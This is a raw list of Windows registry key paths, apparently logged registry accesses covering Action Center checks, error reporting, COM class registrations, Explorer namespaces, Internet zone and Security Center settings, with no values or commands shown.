HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.104
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.104\CheckSetting
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\COM\{CA236752-2E77-4386-B63B-0E34774A413D}
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Windows Error Reporting
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Windows Error Reporting
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ERC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.100
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.100\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LastQueuePesterTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.101
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.101\CheckSetting
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\COM\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0\CheckSetting
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\COM\{6AE07DC1-0244-4C6F-9AB0-5017A56357C3}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{01979c6a-42fa-414c-b8aa-eee2c8202018}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{01979c6a-42fa-414c-b8aa-eee2c8202018}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{01979c6a-42fa-414c-b8aa-eee2c8202018}\LastKnownState
HKEY_CURRENT_USER\Software\Classes\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}
HKEY_CURRENT_USER\Software\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\TreatAs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.101
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.101\CheckSetting
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{945a8954-c147-4acd-923f-40c45405a658}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{945a8954-c147-4acd-923f-40c45405a658}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{945a8954-c147-4acd-923f-40c45405a658}\LastKnownState
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{945a8954-c147-4acd-923f-40c45405a658}.check.42
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{945a8954-c147-4acd-923f-40c45405a658}.check.42\CheckSetting
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{DAB69A6A-4D2A-4D44-94BF-E0091898C881}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{DAB69A6A-4D2A-4D44-94BF-E0091898C881}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{DAB69A6A-4D2A-4D44-94BF-E0091898C881}\LastKnownState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{DAB69A6A-4D2A-4D44-94BF-E0091898C881}.check.100
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{DAB69A6A-4D2A-4D44-94BF-E0091898C881}.check.100\CheckSetting
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}\LastKnownState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}.check.101
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}.check.101\CheckSetting
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{A5268B8E-7DB5-465b-BAB7-BDCDA39A394A}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{A5268B8E-7DB5-465b-BAB7-BDCDA39A394A}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{A5268B8E-7DB5-465b-BAB7-BDCDA39A394A}\LastKnownState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{A5268B8E-7DB5-465b-BAB7-BDCDA39A394A}.check.100
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{A5268B8E-7DB5-465b-BAB7-BDCDA39A394A}.check.100\CheckSetting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Action Center
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\DeviceNotificationCallbacks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\DeviceUpdateLocations
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{35786D3C-B075-49b9-88DD-029876E11C01}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{35786D3C-B075-49b9-88DD-029876E11C01}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{b155bdf8-02f0-451e-9a26-ae317cfd7779}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{b155bdf8-02f0-451e-9a26-ae317cfd7779}\SuppressionPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\MyComputer\NameSpace
HKEY_CLASSES_ROOT\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\MyComputer\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\SortOrderIndex
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}
HKEY_CLASSES_ROOT\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\InProcServer32\LoadWithoutCOM
HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\SortOrderIndex
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{21EC2020-3AEA-1069-A2DD-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{21EC2020-3AEA-1069-A2DD-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{35786D3C-B075-49B9-88DD-029876E11C01}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35786D3C-B075-49B9-88DD-029876E11C01}\SortOrderIndex
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{35786D3C-B075-49B9-88DD-029876E11C01}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{35786D3C-B075-49B9-88DD-029876E11C01}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_CLASSES_ROOT\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{7007ACC7-3202-11D1-AAD2-00805FC1270E}
HKEY_CLASSES_ROOT\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\SortOrderIndex
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{7007ACC7-3202-11D1-AAD2-00805FC1270E}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{7007ACC7-3202-11D1-AAD2-00805FC1270E}
HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\System.ItemNameDisplay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\{B725F130-47EF-101A-A5F1-02608C9EEBAC} 10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ControlPanel\NameSpace\NameCustomizations
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\LocalizedString
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4b\7F06864B
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@C:\Windows\system32\prnfldr.dll,-8036
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\System.ItemNameDisplay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\{B725F130-47EF-101A-A5F1-02608C9EEBAC} 10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\LocalizedString
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@C:\Windows\system32\netshell.dll,-1200
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace\NameCustomizations
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\LocalizedString
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.HideOnDesktop
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{28636AA6-953D-11D2-B5D6-00C04FD918D0} 34
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellEx\IconHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon\OpenIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.FileAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{B725F130-47EF-101A-A5F1-02608C9EEBAC} 13
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ThumbnailCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.DateModified
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{B725F130-47EF-101A-A5F1-02608C9EEBAC} 14
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\GlobalAssocChangedCounter
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableFixSecuritySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableFixSecuritySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1004
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1201
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1405
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1800
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1803
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1804
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1806
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1806
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\VistaSp1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\InternetSettingsDisableNotify
HKEY_CLASSES_ROOT\Applications\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\LockTaskbar
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarSizeMove
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarSizeMove
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Scope
